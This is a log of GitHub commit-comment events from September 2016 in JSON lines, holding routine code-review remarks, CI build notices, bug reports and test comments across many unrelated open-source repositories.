{"id":"4642174457","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19237993,"position":197,"line":262,"path":"tests/Eccube/Tests/Web/CartValidationTest.php","commit_id":"5a788a54b7934704c7d58a983c390c29d8727d40","created_at":"2016-09-30T08:40:45Z","updated_at":"2016-09-30T08:40:45Z","body":"Okey, I'm fixing!!!"}},"created_at":"2016-09-30T08:40:45Z"}
{"id":"4642176089","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19237998,"position":null,"line":null,"path":null,"commit_id":"40d8547c346cd23ecdce9d537dd456545805c399","created_at":"2016-09-30T08:41:08Z","updated_at":"2016-09-30T08:41:08Z","body":"i got it try don't use change mastery at this adventure tab"}},"created_at":"2016-09-30T08:41:08Z"}
{"id":"4642176328","type":"CommitCommentEvent","actor":{"login":"xcambar"},"repo":{"name":"xcambar/ember-cli-is-component"},"payload":{"comment":{"id":19238000,"position":null,"line":null,"path":null,"commit_id":"148334abb003b6adda2acdb612699adb5e5bbd38","created_at":"2016-09-30T08:41:11Z","updated_at":"2016-09-30T08:41:11Z","body":"Thanks for the comment, I saw it was in ember-leaflet, I'm glad you like it :D \r\n\r\nHere's the new release: https://github.com/xcambar/ember-cli-is-component/releases/tag/v0.4.2\r\n"}},"created_at":"2016-09-30T08:41:11Z"}
{"id":"4642177156","type":"CommitCommentEvent","actor":{"login":"vickiizhang"},"repo":{"name":"tencentyun/qcloud-documents"},"payload":{"comment":{"id":19238003,"position":null,"line":null,"path":null,"commit_id":"d291ab7277ad256686253a71459a0e49cc4a7984","created_at":"2016-09-30T08:41:22Z","updated_at":"2016-09-30T08:41:22Z","body":"已同步，遗留现网均存在的编号问题，请后续修正下。"}},"created_at":"2016-09-30T08:41:22Z"}
{"id":"4642185605","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19238013,"position":5,"line":199,"path":"semantics.json","commit_id":"059f6aae8bbdeb8962b728a2d5aeef175d6aa4bf","created_at":"2016-09-30T08:43:16Z","updated_at":"2016-09-30T08:43:16Z","body":"Can you put in the \"deprecated\": true property on the old semantics that you have removed, instead of completely removing them ? If they are \"deprecated\" it is possible to restore them at a later point if we change our mind"}},"created_at":"2016-09-30T08:43:16Z"}
{"id":"4642186503","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19238016,"position":null,"line":null,"path":null,"commit_id":"83260fec79ca32e8e8ede26c38c818691d3a9f63","created_at":"2016-09-30T08:43:29Z","updated_at":"2016-09-30T08:43:29Z","body":"best way to learn git is to keep trying things and breaking a bunch of things along the way :)\r\n\r\nJust let me know if need guidance for something. Unless you have new stuff on this branch (I brought in 2 of the commits), I would consider this branch toast :) and would recommend developing from a branch derived from the most recent master from the main codebase. Once you figure out how to do that, then it becomes really simple to to Pull Requests on github for your code. Trust me, in time you will become a git wizard.\r\n\r\nAs an aside, what are your development environment specifics?"}},"created_at":"2016-09-30T08:43:29Z"}
{"id":"4642188473","type":"CommitCommentEvent","actor":{"login":"DimStar77"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":19238019,"position":null,"line":null,"path":null,"commit_id":"682842918305f127413592d4ad81464b6ea94c3f","created_at":"2016-09-30T08:43:57Z","updated_at":"2016-09-30T08:43:57Z","body":"Undefined subroutine &main::chromiumstep_is_applicable called at /var/lib/openqa/share/tests/opensuse/products/opensuse/main.pm line 659.\r\nCompilation failed in require at /usr/bin/isotovideo line 222."}},"created_at":"2016-09-30T08:43:57Z"}
{"id":"4642190104","type":"CommitCommentEvent","actor":{"login":"Wind0r"},"repo":{"name":"Wind0r/blheli-configurator"},"payload":{"comment":{"id":19238020,"position":22,"line":22,"path":"src/reducers/msp.js","commit_id":"f5b0b45057419b112026f91448a56732343e7249","created_at":"2016-09-30T08:44:18Z","updated_at":"2016-09-30T08:44:18Z","body":"http://eslint.org/docs/rules/no-plusplus\r\n\r\nthe defaut liniting config do not want that.\r\ni also found it strange but have no problem with it.\r\n\r\nmost other loops are change to foreach or for in. \r\nthis also will get changed i think"}},"created_at":"2016-09-30T08:44:18Z"}
{"id":"4642191458","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19238025,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T08:44:36Z","updated_at":"2016-09-30T08:44:36Z","body":"我之前那个要删的是做了个开关的，可以选择不删除。"}},"created_at":"2016-09-30T08:44:36Z"}
{"id":"4642192042","type":"CommitCommentEvent","actor":{"login":"ellinokon"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19238030,"position":5,"line":199,"path":"semantics.json","commit_id":"059f6aae8bbdeb8962b728a2d5aeef175d6aa4bf","created_at":"2016-09-30T08:44:44Z","updated_at":"2016-09-30T08:44:44Z","body":"Ahh! That is clever. Was not aware of such a feature.\r\n\r\nWill fix it promptly!"}},"created_at":"2016-09-30T08:44:44Z"}
{"id":"4642192125","type":"CommitCommentEvent","actor":{"login":"a0x77n"},"repo":{"name":"octopus-platform/joern"},"payload":{"comment":{"id":19238031,"position":null,"line":null,"path":null,"commit_id":"b9375e968bff91884eefaa91179f51887f08dabd","created_at":"2016-09-30T08:44:45Z","updated_at":"2016-09-30T08:44:45Z","body":"Oh, my bad. Of course, it should be `getId()`. I will correct it."}},"created_at":"2016-09-30T08:44:45Z"}
{"id":"4642192699","type":"CommitCommentEvent","actor":{"login":"sli-cs"},"repo":{"name":"callstats-io/callstats.java"},"payload":{"comment":{"id":19238032,"position":1,"line":174,"path":"callstats-java-sdk/src/main/java/io/callstats/sdk/CallStats.java","commit_id":"6f0a023565d60b3704a885a8f7a16d1c6edd78e3","created_at":"2016-09-30T08:44:52Z","updated_at":"2016-09-30T08:44:52Z","body":"you can also put the 'synchronized' in front of this function, I guess."}},"created_at":"2016-09-30T08:44:52Z"}
{"id":"4642193687","type":"CommitCommentEvent","actor":{"login":"rschoene"},"repo":{"name":"tud-zih-energy/libadapt"},"payload":{"comment":{"id":19238036,"position":85,"line":401,"path":"tests/test.c","commit_id":"9d0779fbdd3812f839993793cc74e8fab065d9f7","created_at":"2016-09-30T08:45:06Z","updated_at":"2016-09-30T08:45:06Z","body":"test = test & ! TEST_FILE"}},"created_at":"2016-09-30T08:45:06Z"}
{"id":"4642195117","type":"CommitCommentEvent","actor":{"login":"rschoene"},"repo":{"name":"tud-zih-energy/libadapt"},"payload":{"comment":{"id":19238040,"position":95,"line":408,"path":"tests/test.c","commit_id":"9d0779fbdd3812f839993793cc74e8fab065d9f7","created_at":"2016-09-30T08:45:23Z","updated_at":"2016-09-30T08:45:23Z","body":"test = test & ! TEST_DVFS"}},"created_at":"2016-09-30T08:45:23Z"}
{"id":"4642195674","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19238041,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T08:45:32Z","updated_at":"2016-09-30T08:45:32Z","body":"话说要是发现了设计上的问题记得跟我说一声啊。我顺便把Frice JVM也改了。"}},"created_at":"2016-09-30T08:45:32Z"}
{"id":"4642195867","type":"CommitCommentEvent","actor":{"login":"rschoene"},"repo":{"name":"tud-zih-energy/libadapt"},"payload":{"comment":{"id":19238042,"position":106,"line":416,"path":"tests/test.c","commit_id":"9d0779fbdd3812f839993793cc74e8fab065d9f7","created_at":"2016-09-30T08:45:34Z","updated_at":"2016-09-30T08:45:34Z","body":"test = test & ! TEST_DCT"}},"created_at":"2016-09-30T08:45:34Z"}
{"id":"4642196296","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"akka/akka"},"payload":{"comment":{"id":19238044,"position":38,"line":99,"path":"akka-cluster/src/main/scala/akka/cluster/ClusterRemoteWatcher.scala","commit_id":"0f376e751ee7d4d0c1c34fa355dc59da3df9e860","created_at":"2016-09-30T08:45:40Z","updated_at":"2016-09-30T08:45:40Z","body":"ah, here is the bug! using `uid` instead of `longUid`. I could at first not understand how this could cause the failure. Tests FTW."}},"created_at":"2016-09-30T08:45:40Z"}
{"id":"4642196678","type":"CommitCommentEvent","actor":{"login":"pouu69"},"repo":{"name":"pouu69/Mailgun"},"payload":{"comment":{"id":19238045,"position":null,"line":null,"path":null,"commit_id":"2f3eddc6a4df747934851b7ce858660411b1b4f5","created_at":"2016-09-30T08:45:46Z","updated_at":"2016-09-30T08:45:46Z","body":"      $content = \"test mail\";\r\n      $data = [\r\n          'content' => nl2br($content)\r\n      ];\r\n\r\n      $users = [\r\n          [\"email\" => \"pouu69@test.com\", \"name\" => \"a\"],\r\n          [\"email\" => \"pouu69@testa.com\", \"name\" => \"a\"],\r\n      ];\r\n      \\Mailgun::bulkSend('test.emails', $users, $data, function($message){\r\n              $message->subject('Welcome!');\r\n      });\r\n"}},"created_at":"2016-09-30T08:45:46Z"}
{"id":"4642197690","type":"CommitCommentEvent","actor":{"login":"safwank"},"repo":{"name":"safwank/toniq"},"payload":{"comment":{"id":19238050,"position":null,"line":null,"path":null,"commit_id":"c09a51f7a47d9a695d23aafde70eeb818d2f2173","created_at":"2016-09-30T08:46:00Z","updated_at":"2016-09-30T08:46:00Z","body":"Re: recovery, good catch! Should be fairly straightforward to implement.\r\n\r\nRe: flushing a job as soon as they're due, brilliant idea. Although as you've pointed out, when all jobs are flushed, some jobs might end up being executed twice. I'm sure there's a good way of avoiding that, but it does add additional complexity.\r\n\r\nI'll implement recovery and see what can be done about the latter."}},"created_at":"2016-09-30T08:46:00Z"}
{"id":"4642199145","type":"CommitCommentEvent","actor":{"login":"rschoene"},"repo":{"name":"tud-zih-energy/libadapt"},"payload":{"comment":{"id":19238053,"position":75,"line":393,"path":"tests/test.c","commit_id":"9d0779fbdd3812f839993793cc74e8fab065d9f7","created_at":"2016-09-30T08:46:20Z","updated_at":"2016-09-30T08:46:20Z","body":"test &= !TEST_X(&ADAPT"}},"created_at":"2016-09-30T08:46:20Z"}
{"id":"4642199186","type":"CommitCommentEvent","actor":{"login":"kebeclibre"},"repo":{"name":"kebeclibre/Planets"},"payload":{"comment":{"id":19238054,"position":null,"line":null,"path":null,"commit_id":"3a13742984b5337ddb6f234ae93c1df60cf89542","created_at":"2016-09-30T08:46:21Z","updated_at":"2016-09-30T08:46:21Z","body":"qdsfsqf"}},"created_at":"2016-09-30T08:46:21Z"}
{"id":"4642204629","type":"CommitCommentEvent","actor":{"login":"DieHertz"},"repo":{"name":"Wind0r/blheli-configurator"},"payload":{"comment":{"id":19238063,"position":22,"line":22,"path":"src/reducers/msp.js","commit_id":"f5b0b45057419b112026f91448a56732343e7249","created_at":"2016-09-30T08:47:37Z","updated_at":"2016-09-30T08:47:37Z","body":"\"allowForLoopAfterthoughts\": true allows unary operators ++ and -- in the afterthought (final expression) of a for loop."}},"created_at":"2016-09-30T08:47:37Z"}
{"id":"4642206534","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"pfefferle/wordpress-webmention"},"payload":{"comment":{"id":19238065,"position":null,"line":null,"path":null,"commit_id":"ec114c6592f5ed3b9ce32ca9403c770d36c88bdf","created_at":"2016-09-30T08:48:03Z","updated_at":"2016-09-30T08:48:03Z","body":"thanks, should be fixed now..."}},"created_at":"2016-09-30T08:48:03Z"}
{"id":"4642207257","type":"CommitCommentEvent","actor":{"login":"NicolasGrosjean"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19238067,"position":null,"line":null,"path":null,"commit_id":"6942bdaa11b3f40414bbce939dd917cfa21916a7","created_at":"2016-09-30T08:48:12Z","updated_at":"2016-09-30T08:48:12Z","body":"I didn't understand what you have said with / and \\\\ in the GFX, now with your commit I understand.\r\nIn fact when you copy the path from your file explorer in Windows, you have \\\\ instead of /.\r\nI don't think that \\\\ is better than /.\r\nBut by putting \\\\, it seems you introduce some errors, I have corrected them in the next commit.\r\nFor example if there is only one backslash (\\) it can be interpreted as a combinaison with the following letter (example \\n, \\r, \\t...)\r\n\r\nFor the hist event file, I have noted a strange modifications.\r\nCould you confirm it is intentionnal not a mistake when changing:\r\nline 346: hist.5 became hist.8 (why not hist.6?)"}},"created_at":"2016-09-30T08:48:12Z"}
{"id":"4642207536","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19238068,"position":16,"line":660,"path":"js/multichoice.js","commit_id":"059f6aae8bbdeb8962b728a2d5aeef175d6aa4bf","created_at":"2016-09-30T08:48:15Z","updated_at":"2016-09-30T08:48:15Z","body":"Please deprecate almostText as well"}},"created_at":"2016-09-30T08:48:15Z"}
{"id":"4642209271","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19238072,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T08:48:39Z","updated_at":"2016-09-30T08:48:39Z","body":"\r\n![](https://assets-cdn.github.com/images/icons/emoji/unicode/1f602.png)\r\n一旦有部分对象需要GC 部分不要咧\r\n"}},"created_at":"2016-09-30T08:48:39Z"}
{"id":"4642212047","type":"CommitCommentEvent","actor":{"login":"avnish30jn"},"repo":{"name":"apache/libcloud"},"payload":{"comment":{"id":19238079,"position":null,"line":null,"path":null,"commit_id":"054f29a94eef433fe208641b5f63ca2f0c613672","created_at":"2016-09-30T08:49:18Z","updated_at":"2016-09-30T08:49:18Z","body":"Hi Kami,\r\n\r\nI am using libcloud 1.2.1 with pysphere 0.1.7. I am getting the below error when trying to connect to the ESXi host.\r\n\r\nTraceback (most recent call last):\r\n  File \"<stdin>\", line 1, in <module>\r\n  File \"/Library/Python/2.7/site-packages/libcloud/compute/drivers/vsphere.py\", line 152, in __init__\r\n    port=port, url=url)\r\n  File \"/Library/Python/2.7/site-packages/libcloud/common/base.py\", line 1177, in __init__\r\n    self.connection = self.connectionCls(*args, **conn_kwargs)\r\nTypeError: __init__() got an unexpected keyword argument 'retry_delay'\r\n\r\n\r\nI am using the below commands to connect to the host.\r\n\r\nfrom libcloud.compute.types import Provider\r\nfrom libcloud.compute.providers import get_driver\r\nvsphere = get_driver(Provider.VSPHERE)\r\ndriver = vsphere(host='<ip>',username='username',password='password')\r\n\r\nI can do this using pysphere only but not with libcloud. Tried looking on the internet and changing the content of the libraries but in vain. could you please help me here ?\r\n"}},"created_at":"2016-09-30T08:49:18Z"}
{"id":"4642212465","type":"CommitCommentEvent","actor":{"login":"ellinokon"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19238082,"position":16,"line":660,"path":"js/multichoice.js","commit_id":"059f6aae8bbdeb8962b728a2d5aeef175d6aa4bf","created_at":"2016-09-30T08:49:25Z","updated_at":"2016-09-30T08:49:25Z","body":"Already deprecated :)"}},"created_at":"2016-09-30T08:49:25Z"}
{"id":"4642214147","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238083,"position":null,"line":null,"path":null,"commit_id":"f599efab8df2e280bed5169be26cbf073c342237","created_at":"2016-09-30T08:49:47Z","updated_at":"2016-09-30T08:49:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1218](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14662&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T08:49:47Z"}
{"id":"4642215217","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238086,"position":null,"line":null,"path":null,"commit_id":"f599efab8df2e280bed5169be26cbf073c342237","created_at":"2016-09-30T08:50:02Z","updated_at":"2016-09-30T08:50:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1218](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14662&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:00:14"}},"created_at":"2016-09-30T08:50:02Z"}
{"id":"4642215228","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238087,"position":null,"line":null,"path":null,"commit_id":"da082576ff71e6ad86ec9ba96c9d8fb3932d0bd5","created_at":"2016-09-30T08:50:02Z","updated_at":"2016-09-30T08:50:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1219](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14665&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T08:50:02Z"}
{"id":"4642215254","type":"CommitCommentEvent","actor":{"login":"yanyueoo7"},"repo":{"name":"yanyueoo7/PythonOther"},"payload":{"comment":{"id":19238088,"position":null,"line":null,"path":null,"commit_id":"1bcf6bd2cc3e2ec280c6fc4f291a4f4bb24f0af8","created_at":"2016-09-30T08:50:02Z","updated_at":"2016-09-30T08:50:02Z","body":"Check Process Name Is Running Stauts..."}},"created_at":"2016-09-30T08:50:02Z"}
{"id":"4642218464","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19238092,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T08:50:44Z","updated_at":"2016-09-30T08:50:44Z","body":"对 可以这样 距离窗口边缘一倍距离远的 隐藏不删除 距离10倍的删除\r\n这样比较科学吧"}},"created_at":"2016-09-30T08:50:44Z"}
{"id":"4642218722","type":"CommitCommentEvent","actor":{"login":"zhao943018529"},"repo":{"name":"zhao943018529/demo"},"payload":{"comment":{"id":19238093,"position":1,"line":1,"path":"README.md","commit_id":"86e824cff4aaf8f4f90f914dec0b384e104e0a16","created_at":"2016-09-30T08:50:48Z","updated_at":"2016-09-30T08:50:48Z","body":"dddddadfasdfsaf"}},"created_at":"2016-09-30T08:50:48Z"}
{"id":"4642221133","type":"CommitCommentEvent","actor":{"login":"tuotw"},"repo":{"name":"tuotw/1609tt"},"payload":{"comment":{"id":19238101,"position":1,"line":1,"path":"1.txt","commit_id":"9a08691d009ffb25ffe2b5c20da39f0d69a86f8a","created_at":"2016-09-30T08:51:22Z","updated_at":"2016-09-30T08:51:22Z","body":"fdsfsfsd"}},"created_at":"2016-09-30T08:51:22Z"}
{"id":"4642224473","type":"CommitCommentEvent","actor":{"login":"pfefferle"},"repo":{"name":"pfefferle/wordpress-webmention"},"payload":{"comment":{"id":19238108,"position":null,"line":null,"path":null,"commit_id":"ec114c6592f5ed3b9ce32ca9403c770d36c88bdf","created_at":"2016-09-30T08:52:06Z","updated_at":"2016-09-30T08:52:06Z","body":"I need to write some tests for that"}},"created_at":"2016-09-30T08:52:06Z"}
{"id":"4642227045","type":"CommitCommentEvent","actor":{"login":"oweitman"},"repo":{"name":"oweitman/slimserver"},"payload":{"comment":{"id":19238113,"position":null,"line":null,"path":null,"commit_id":"048572521ba0c9af6924d4ed1790ecfc3fc1bbe0","created_at":"2016-09-30T08:52:42Z","updated_at":"2016-09-30T08:52:42Z","body":"due to the same logic, the change from commit de758450347654bcfa4ebdad29961f53a0935c59 should also be done in Slim/Plugin/Extensions/Settings.pm"}},"created_at":"2016-09-30T08:52:42Z"}
{"id":"4642228119","type":"CommitCommentEvent","actor":{"login":"suckmeoff"},"repo":{"name":"suckmeoff/test1609zxy"},"payload":{"comment":{"id":19238115,"position":null,"line":null,"path":null,"commit_id":"162f0d40778d1fc4e5758ff164d6cfa6e5b6679a","created_at":"2016-09-30T08:52:58Z","updated_at":"2016-09-30T08:52:58Z","body":"65465"}},"created_at":"2016-09-30T08:52:58Z"}
{"id":"4642228397","type":"CommitCommentEvent","actor":{"login":"DimStar77"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":19238117,"position":null,"line":null,"path":null,"commit_id":"682842918305f127413592d4ad81464b6ea94c3f","created_at":"2016-09-30T08:53:02Z","updated_at":"2016-09-30T08:53:02Z","body":"created https://github.com/os-autoinst/os-autoinst-distri-opensuse/pull/1883\r\n\r\nthe two new API definitions are not exported and thus not accessible outside of main_common"}},"created_at":"2016-09-30T08:53:02Z"}
{"id":"4642229058","type":"CommitCommentEvent","actor":{"login":"seb432"},"repo":{"name":"zone117x/node-cryptonote-pool"},"payload":{"comment":{"id":19238119,"position":null,"line":null,"path":null,"commit_id":"f1622050e059b57e2c648970155ff28ff9077f1c","created_at":"2016-09-30T08:53:11Z","updated_at":"2016-09-30T08:53:11Z","body":"This fix is not enough.\r\n\r\nUnlocker module does not crash anymore but worker's balance is not updated when block is unlocked."}},"created_at":"2016-09-30T08:53:11Z"}
{"id":"4642230566","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19238122,"position":6,"line":5,"path":"library.json","commit_id":"0e5e932165ada33c7f2a6e629a497f71ea9521f0","created_at":"2016-09-30T08:53:27Z","updated_at":"2016-09-30T08:53:27Z","body":"It should not be necessary to bump the minor version for these changes. Minor bump is not necessary when semantics are added or deleted (as long as they are given default values in JS). Minor bump is necessary if semantics are changed/moved or the external API of a library changes."}},"created_at":"2016-09-30T08:53:27Z"}
{"id":"4642232421","type":"CommitCommentEvent","actor":{"login":"appdevdesigns"},"repo":{"name":"appdevdesigns/appdev-opsportal"},"payload":{"comment":{"id":19238127,"position":null,"line":null,"path":null,"commit_id":"c3ff96acd330f5c782b9872b5b5ca6e160ad233a","created_at":"2016-09-30T08:53:46Z","updated_at":"2016-09-30T08:53:46Z","body":"#97 "}},"created_at":"2016-09-30T08:53:46Z"}
{"id":"4642233754","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238132,"position":null,"line":null,"path":null,"commit_id":"da082576ff71e6ad86ec9ba96c9d8fb3932d0bd5","created_at":"2016-09-30T08:54:04Z","updated_at":"2016-09-30T08:54:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1219](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14665&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:04:02"}},"created_at":"2016-09-30T08:54:04Z"}
{"id":"4642238820","type":"CommitCommentEvent","actor":{"login":"phdd"},"repo":{"name":"phdd/diplom"},"payload":{"comment":{"id":19238139,"position":33,"line":79,"path":"document.md","commit_id":"d6d4a9d63952b1a25060770d36bca413761dc2f5","created_at":"2016-09-30T08:55:14Z","updated_at":"2016-09-30T08:55:14Z","body":"Es geht um die Stichpunkte nach diesem Kommentar (Einschränkungen/Voraussetzungen). Ich werd Fließtext draus bauen. Danke."}},"created_at":"2016-09-30T08:55:14Z"}
{"id":"4642248490","type":"CommitCommentEvent","actor":{"login":"liqi88"},"repo":{"name":"liqi88/git"},"payload":{"comment":{"id":19238151,"position":null,"line":null,"path":null,"commit_id":"8f8c54a9bc845f85bb29b6fd093e958a04ae63fe","created_at":"2016-09-30T08:57:21Z","updated_at":"2016-09-30T08:57:21Z","body":"哈哈"}},"created_at":"2016-09-30T08:57:21Z"}
{"id":"4642248826","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19238152,"position":null,"line":null,"path":null,"commit_id":"af869881ba63e9ae39cb7c7e2dad35374f7668aa","created_at":"2016-09-30T08:57:25Z","updated_at":"2016-09-30T08:57:25Z","body":"also brought this commit into the main codebase (removed the merge stuff)"}},"created_at":"2016-09-30T08:57:25Z"}
{"id":"4642250112","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-multi-choice"},"payload":{"comment":{"id":19238153,"position":5,"line":199,"path":"semantics.json","commit_id":"059f6aae8bbdeb8962b728a2d5aeef175d6aa4bf","created_at":"2016-09-30T08:57:42Z","updated_at":"2016-09-30T08:57:42Z","body":"New semantic fields must be added to all language files. A tip for doing this smoothly is using the [H5P CLI ](https://h5p.org/h5p-cli-guide)command add-english-texts (which is not documented in the guide, but should have a description in the actual CLI tool) ;)"}},"created_at":"2016-09-30T08:57:42Z"}
{"id":"4642252990","type":"CommitCommentEvent","actor":{"login":"Asido"},"repo":{"name":"bertvansteen/EpubSharp"},"payload":{"comment":{"id":19238159,"position":5,"line":5,"path":"EpubSharp.Tests/EpubBookTests.cs","commit_id":"c0403bb1b814744c360856065d78e04d09465640","created_at":"2016-09-30T08:58:21Z","updated_at":"2016-09-30T08:58:21Z","body":"I am not happy having a dependency on HtmlAgilityPack and System.Drawing. Therefore I have removed them in the current beta release. You can install it via nuget EpubSharp.dll-1.1.3-beta (it's a pre-release). I used HtmlAgilityPack for a two-liner in order to fix malformed HTML. The reason is because System.Xml.Linq is very strict and HtmlAgilityPack is able to find and fix issues like unclosed tags and such. I would like to hear whether some of your 10,000 epubs now fail to open because of that.\r\n\r\nFrom now on it also supports multiple frameworks - \"net451\" and \"netstandard1.3\" - so installing the library in a classic c# project doesn't install the whole .NET Core framework anymore.\r\n\r\nThe reason I started writing my own epub library is because all other libraries are rubbish. I have unit tests, where I read and write ~300 epubs and it opens them all, while the best library I could find was able to open <50%. The epubs aren't committed to the repo as some are copyrighted. If you find some epubs, which it can't open, I would greatly appreciate if you could send them to me, so that I can fix it. My email is available in my github profile."}},"created_at":"2016-09-30T08:58:21Z"}
{"id":"4642255677","type":"CommitCommentEvent","actor":{"login":"yagee-de"},"repo":{"name":"MyCoRe-Org/mycore.svntest"},"payload":{"comment":{"id":19238161,"position":null,"line":null,"path":null,"commit_id":"071c7d03b9fc73f60f2451e2c2a3b227923208eb","created_at":"2016-09-30T08:58:55Z","updated_at":"2016-09-30T08:58:55Z","body":"why is 8a6eebc374b9b6c2ac8fe2b04a2e9f22ca492dcf not referenced?"}},"created_at":"2016-09-30T08:58:55Z"}
{"id":"4642258026","type":"CommitCommentEvent","actor":{"login":"liqi88"},"repo":{"name":"liqi88/git"},"payload":{"comment":{"id":19238164,"position":null,"line":null,"path":null,"commit_id":"8f8c54a9bc845f85bb29b6fd093e958a04ae63fe","created_at":"2016-09-30T08:59:23Z","updated_at":"2016-09-30T08:59:23Z","body":"# [_****_``](url) @"}},"created_at":"2016-09-30T08:59:23Z"}
{"id":"4642259121","type":"CommitCommentEvent","actor":{"login":"yagee-de"},"repo":{"name":"MyCoRe-Org/mycore.svntest"},"payload":{"comment":{"id":19238165,"position":null,"line":null,"path":null,"commit_id":"071c7d03b9fc73f60f2451e2c2a3b227923208eb","created_at":"2016-09-30T08:59:37Z","updated_at":"2016-09-30T08:59:37Z","body":"and 071c7d03b9fc73f60f2451e2c2a3b227923208eb\r\n"}},"created_at":"2016-09-30T08:59:37Z"}
{"id":"4642263046","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19238169,"position":null,"line":null,"path":null,"commit_id":"6942bdaa11b3f40414bbce939dd917cfa21916a7","created_at":"2016-09-30T09:00:26Z","updated_at":"2016-09-30T09:00:26Z","body":"Then the advice I had received was wrong.\r\n\r\nFor the hist file, that was intended, 6 being a triggered event by other conditions (follow-up to 5), while hist.8 is the follow-up to the Henotikon"}},"created_at":"2016-09-30T09:00:26Z"}
{"id":"4642263452","type":"CommitCommentEvent","actor":{"login":"paazmaya"},"repo":{"name":"nightwatchjs/nightwatch-docs"},"payload":{"comment":{"id":19238170,"position":4,"line":38,"path":"guide/configuration/config-basic-settings.md","commit_id":"75dc4d4c318072d9c7e3d03c5f9b6cc83c6d193b","created_at":"2016-09-30T09:00:31Z","updated_at":"2016-09-30T09:00:31Z","body":"Seems like a typo here, `v6.0.1` should be `v0.6.1`?"}},"created_at":"2016-09-30T09:00:31Z"}
{"id":"4642265455","type":"CommitCommentEvent","actor":{"login":"sentinalll"},"repo":{"name":"sentinalll/gisite"},"payload":{"comment":{"id":19238182,"position":null,"line":null,"path":null,"commit_id":"a60131eec33a3eec1cc9cca0ca6071766a97fecd","created_at":"2016-09-30T09:00:58Z","updated_at":"2016-09-30T09:00:58Z","body":"Delete CNAME"}},"created_at":"2016-09-30T09:00:58Z"}
{"id":"4642266155","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19238185,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-30T09:01:08Z","updated_at":"2016-09-30T09:01:08Z","body":"![Szeptember 30. - Péntek](http://ujlipot.vakvarju.com/data/napimenu/24.jpg?v=1474636673)\nTejszínes hagymaleves fokhagymás lepénnyel\r\nBolognai húsos lasagne paradicsommártással\r\nTiramisu pohárkrém"}},"created_at":"2016-09-30T09:01:08Z"}
